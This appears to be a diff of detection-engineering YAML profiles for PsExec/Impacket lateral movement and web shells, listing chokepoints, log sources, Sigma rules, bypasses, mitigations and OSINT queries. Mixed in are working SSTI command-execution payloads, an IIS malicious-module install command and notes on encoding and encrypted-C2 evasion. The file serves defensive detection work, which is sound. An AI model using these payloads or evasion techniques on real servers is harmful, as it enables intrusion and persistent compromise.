SigmaRef: sigma-rules/remote-execution/analyst.yml
BypassNote: LOTL tools (winrs.exe, wmic /node:, Enter-PSSession, Invoke-Command) produce identical telemetry to Impacket
but with signed Microsoft binaries — detection must be purely behavioral with no reliance on tool signatures
but with signed Microsoft binaries. Detection must be purely behavioral with no reliance on tool signatures
- Stage: Lateral Spread
Input: Remote command interpreter is running on one or more targets
Invariant: The same credential and execution primitive sequence repeats across multiple hosts in a short window or follows
@@ -207,7 +195,7 @@ Chokepoints:
Observable: 'Windows Security EID 4624 showing the same account authenticating to multiple hosts within minutes.
Sysmon EID 3 showing same source IP connecting to multiple RFC1918 destinations on SMB/WinRM ports.'
WhyCantBypass: Lateral movement by definition requires replication of the credential-plus-primitive pattern on each subsequent
host — the telemetry is identical on every hop
host. The telemetry is identical on every hop
LogSources:
- Windows Security Event ID 4624 (multiple target hosts, short window)
- Sysmon Event ID 3 (same source IP, multiple RFC1918 destinations)
@@ -332,7 +320,7 @@ OsintSources:
- Platform: Shodan
Query: port:5985 product:"Microsoft HTTPAPI"
URL: https://www.shodan.io/search?query=port%3A5985+product%3A%22Microsoft+HTTPAPI%22
Notes: Finds internet-exposed WinRM endpoints; narrow with 'org:' or 'net:' filters to audit your own attack surface — run
Notes: Finds internet-exposed WinRM endpoints; narrow with 'org:' or 'net:' filters to audit your own attack surface. Run
a second query on port 5986 for the HTTPS variant.
- Platform: Shodan
Query: ssl.jarm:07d14d16d21d21d00042d41d00041de5fb3038104f457d92ba37e62256d5 port:443
@@ -351,7 +339,7 @@ KnownBypasses:
Mitigation: Enable SMB signing and LDAP signing; disable NTLM where operationally feasible.
- Bypass: Using legitimate admin tools (psexec.exe from Sysinternals)
Mitigation: Enforce software allowlisting and monitor hash for known-good vs. impersonated versions.
- Bypass: Living Off the Land — built-in Windows admin tools (winrs.exe, wmic /node:, Enter-PSSession)
- Bypass: Living Off the Land using built-in Windows admin tools (winrs.exe, wmic /node:, Enter-PSSession)
Mitigation: Restrict WinRM and WMI access via Windows Firewall; require PAW for remote administration.
- Bypass: Kerberos-based lateral movement (Overpass-the-Hash, Pass-the-Ticket, Silver/Golden Tickets)
Mitigation: Enable AES encryption for Kerberos; protect the krbtgt account; monitor for anomalous TGS requests.
@@ -386,13 +374,13 @@ RawLogs:
IpPort: 49221
# LogonType=3 (Network) from internal IP — pre-execution authentication
# LogonType=3 (Network) from internal IP. Pre-execution authentication.
'
- Type: Windows Event Log
EventId: 5145
Source: Microsoft-Windows-Security-Auditing
Description: IPC$ share access — PsExec/Impacket opens IPC$/svcctl before service creation
Description: IPC$ share access. PsExec/Impacket opens IPC$/svcctl before service creation
MatchedRules:
- Analyst
Sample: 'EventID: 5145 (A network share object was checked for access)
@@ -418,7 +406,7 @@ RawLogs:
- Type: Windows Event Log
EventId: 7045
Source: Service Control Manager
Description: Random-named service installed from TEMP path — classic PsExec/Impacket signature
Description: Random-named service installed from TEMP path. Classic PsExec/Impacket signature
MatchedRules:
- Research
- Hunt
@@ -446,7 +434,7 @@ RawLogs:
- Type: Sysmon
EventId: 1
Source: Microsoft-Windows-Sysmon/Operational
Description: cmd.exe spawned from services.exe — service binary executing attacker commands
Description: cmd.exe spawned from services.exe. Service binary executing attacker commands
MatchedRules:
- Hunt
- Analyst
@@ -466,7 +454,7 @@ RawLogs:
# services.exe → cmd.exe is the canonical PsExec parent chain
# Output redirected to ADMIN$ share — PsExec output capture pattern
# Output redirected to ADMIN$ share. PsExec output capture pattern.
'
EmulationScript:
+17 -29
View File
@@ -16,7 +16,7 @@ DetectionPriority: CRITICAL
ThreatPrevalence: HIGH
DetectionDifficulty: MEDIUM
Description: 'Adversaries plant web-accessible scripts (web shells) on compromised servers to maintain persistent command
execution via HTTP/HTTPS. Web shells are deployed in virtually every major web-facing compromise — appearing in 35% of Q4
execution via HTTP/HTTPS. Web shells are deployed in virtually every major web-facing compromise, appearing in 35% of Q4
2024 IR incidents (Cisco Talos) and serving as the primary persistence mechanism in ProxyLogon, ProxyShell, MOVEit, Barracuda
ESG, and Ivanti zero-day campaigns. Despite diversity in language (PHP/ASP.NET/JSP/Python), encoding (base64, XOR, gzinflate,
multi-layer), and evasion technique (polyglot files, fileless IIS modules, steganography), the chokepoint is invariant:
@@ -141,7 +141,7 @@ Variations:
Notes: 'Webshells deployed against Ivanti Connect Secure appliances via CVE-2023-46805 (auth bypass) and CVE-2024-21887
(command injection). GLASSTOKEN was the initial variant; BUSHWALK, LIGHTWIRE, and CHAINLINE were deployed post-mitigation
bypass. Over 1,700 appliances compromised. Demonstrates the shift from web application webshells to network appliance
webshells — same parent-child execution pattern, different host OS environment.
webshells. Same parent-child execution pattern, different host OS environment.
'
VariantId: glasstoken-bushwalk-ivanti
@@ -158,7 +158,7 @@ Variations:
SourceURL: https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/
Notes: 'Webshell-style implants deployed by UNC4841 (China-nexus) against Barracuda Email Security Gateway appliances via
CVE-2023-2868 (remote command injection via TAR file). Exploited as zero-day from October 2022; disclosed May 2023. CISA
mandated full appliance replacement — patches were insufficient. Demonstrates webshells surviving factory reset via firmware-level
mandated full appliance replacement; patches were insufficient. Demonstrates webshells surviving factory reset via firmware-level
persistence on physical appliances.
'
@@ -184,7 +184,7 @@ Variations:
VariantId: fileless-iis-native-modules
Command:
Invocation: "# Installed as native IIS module (C++ DLL):\nappcmd.exe install module /name:\"MyModule\" /image:\"C:\\path\\to\\malicious.dll\"\n# Or via web.config: <modules><add name=\"MyModule\" .../></modules>\n# No script file on disk — runs in-process with w3wp.exe"
Context: 'Documented by Microsoft (Dec 2022). Native C++ IIS modules run in-process with w3wp.exe — no child process for basic operations. Can intercept credentials from HTTP traffic.'
Context: 'Documented by Microsoft (Dec 2022). Native C++ IIS modules run in-process with w3wp.exe; no child process for basic operations. Can intercept credentials from HTTP traffic.'
Artifacts:
- 'Sysmon EID 7: Unusual DLL loaded by w3wp.exe'
- 'IIS logs: appcmd.exe install module commands'
@@ -221,7 +221,7 @@ Variations:
VariantId: server-side-template-injection-ssti-webshells
Command:
Invocation: "# Jinja2: {{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}\n# Twig: {{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"whoami\")}}\n# FreeMarker: <#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"whoami\")}"
Context: 'Exploits template engines to execute code without uploading a file. No persistent file on disk — the shell is the injection payload itself.'
Context: 'Exploits template engines to execute code without uploading a file. No persistent file on disk. The shell is the injection payload itself.'
Artifacts:
- 'Web logs: Template syntax in request parameters ({{ }}, <# >, etc.)'
- 'Sysmon EID 1: Web server spawning cmd.exe/sh after template rendering'
@@ -233,26 +233,14 @@ Prerequisites:
- Web server must execute the shell's scripting language (PHP, ASP.NET, JSP, etc.)
- HTTP/HTTPS access to the deployed shell from attacker infrastructure
- Server must have OS command execution capability (not hardened to deny shell spawning)
AttackerControls:
- Web shell language (PHP, ASP.NET, JSP, Python)
- Obfuscation technique (encoding, encryption, polyglot)
- Delivery method (exploit, upload, supply chain)
- Shell architecture (one-liner, modular, encrypted C2)
- Filename and location on disk
AttackerCannotControl:
- Web server process must spawn a child OS interpreter or load attacker-controlled code
- Malicious code must be reachable by the web server (file on disk, loaded DLL, or injected input)
- HTTP request triggers the shell execution
- Child process inherits web server's user context
- Process creation or DLL load event is logged with web server as parent
Chokepoints:
- Stage: Shell Deployment
Input: Attacker has write access to web-accessible directory, module registry, or injectable input field
Invariant: Must deploy executable code reachable by the web server — a script file in the web root,
Invariant: Must deploy executable code reachable by the web server. Options are a script file in the web root,
a native DLL loaded as an IIS module, or an injection payload processed by a template engine
Observable: 'Script-based: Sysmon EID 11 showing w3wp.exe/httpd/nginx writing .php/.aspx/.jsp to web root.
Module-based: Sysmon EID 7 showing unusual DLL loaded by w3wp.exe or appcmd.exe install module.
Injection-based: No file artifact — detected at the execution stage.'
Injection-based: No file artifact. Detected at the execution stage.'
WhyCantBypass: The web server must be able to reach and execute the attacker's code. For file-based shells,
the file must exist on disk. For IIS modules, the DLL must be loaded. For SSTI, the template engine must
process the input. Each path produces a different artifact but all require server-side code execution.
@@ -267,7 +255,7 @@ Chokepoints:
Observable: 'Sysmon EID 1 showing w3wp.exe / httpd / nginx spawning cmd.exe, powershell.exe, /bin/sh, /bin/bash, or
python. This parent-child relationship is the invariant regardless of shell language or obfuscation.'
WhyCantBypass: The web shell must execute OS commands to be useful. The OS requires a process to run those commands.
That process creation — with a web server parent — is always observable.
That process creation, with a web server parent, is always observable.
LogSources:
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)
@@ -389,7 +377,7 @@ Detections:
server-side scripting
SigmaRule: sigma-rules/web-shells/hunt.yml
- Level: Analyst
Description: Web server spawns shell interpreter with suspicious command AND web-accessible file recently created — direct
Description: Web server spawns shell interpreter with suspicious command AND web-accessible file recently created. Direct
webshell execution signal
LogSources:
- Sysmon Event ID 1 (Process Creation)
@@ -442,7 +430,7 @@ OsintSources:
- Platform: Shodan
Query: http.title:"WSO" OR http.title:"b374k" OR http.title:"c99" OR http.title:"FilesMan" OR http.title:"Antak Webshell"
URL: https://www.shodan.io/search?query=http.title%3A%22WSO%22+OR+http.title%3A%22b374k%22+OR+http.title%3A%22c99%22
Notes: Finds internet-exposed web shells with default page titles intact — common in mass exploitation campaigns where attacker
Notes: Finds internet-exposed web shells with default page titles intact. Common in mass exploitation campaigns where attacker
cadence outpaces cleanup. FilesMan and Antak are additional shells frequently left exposed. Also try http.html:"eval(base64_decode"
to catch obfuscated PHP shells that render without a recognizable title.
- Platform: URLScan
@@ -454,13 +442,13 @@ OsintSources:
- Platform: VirusTotal Intelligence
Query: tag:webshell positives:0 type:text
URL: https://www.virustotal.com/gui/search/tag%3Awebshell%20positives%3A0%20type%3Atext
Notes: Requires VT Intelligence subscription. Finds webshell samples currently evading all commercial AV detection — the
most dangerous variants in active use. Consistent with ShellForge paper (arXiv 2601.22182) finding 93.9% evasion against
Notes: Requires VT Intelligence subscription. Finds webshell samples currently evading all commercial AV detection. These
are the most dangerous variants in active use. Consistent with ShellForge paper (arXiv 2601.22182) finding 93.9% evasion against
commercial engines. Sort by submission date to prioritize the newest evasive variants.
- Platform: Censys
Query: 'services.http.response.body: "eval(base64_decode" and services.http.response.status_code: 200'
URL: https://search.censys.io/search?resource=hosts&q=services.http.response.body%3A+%22eval(base64_decode%22
Notes: Finds web servers returning HTTP 200 responses with the eval(base64_decode PHP obfuscation pattern — a near-universal
Notes: Finds web servers returning HTTP 200 responses with the eval(base64_decode PHP obfuscation pattern. This is a near-universal
indicator of a live obfuscated PHP shell. High precision; few legitimate pages contain this pattern. Requires Censys account.
KnownBypasses:
- Bypass: Multi-layer encoding (base64 + gzinflate + XOR + eval) bypasses keyword and signature scanning
@@ -488,7 +476,7 @@ KnownBypasses:
attacker reconnaissance.
'
- Bypass: SSTI-based execution requires no uploaded file — exploits existing template processing
- Bypass: SSTI-based execution requires no uploaded file; it exploits existing template processing
Mitigation: Sanitize all user input before passing to template engines; disable dangerous template evaluation features;
enforce context-aware output encoding
Detection: 'WAF rules for SSTI payload patterns (${{, <%=, #{7*7}); web server access logs showing injection payloads in
@@ -496,8 +484,8 @@ KnownBypasses:
- Bypass: Encrypted C2 channels (Godzilla, Behinder) bypass network-based detection of webshell traffic
Mitigation: TLS inspection at network boundary; behavioral analysis of HTTP traffic patterns (high POST frequency to a single
endpoint, fixed-interval requests, unusual or rotating User-Agent strings)
Detection: 'Network-layer detection is unreliable against encrypted shells. Process creation monitoring remains effective
— even Godzilla and Behinder must spawn child processes to execute OS commands. The invariant signal is the endpoint:
Detection: 'Network-layer detection is unreliable against encrypted shells. Process creation monitoring remains effective.
Even Godzilla and Behinder must spawn child processes to execute OS commands. The invariant signal is the endpoint:
w3wp.exe or java spawning cmd.exe or /bin/sh, regardless of how the HTTP command request was encrypted.
'
@@ -562,7 +550,7 @@ RawLogs:
- Type: Sysmon
EventId: 1
Source: Microsoft-Windows-Sysmon/Operational
Description: PowerShell with encoded command spawned by w3wp.exe — encoded web shell execution
Description: PowerShell with encoded command spawned by w3wp.exe. Encoded web shell execution
MatchedRules:
- Hunt
- Analyst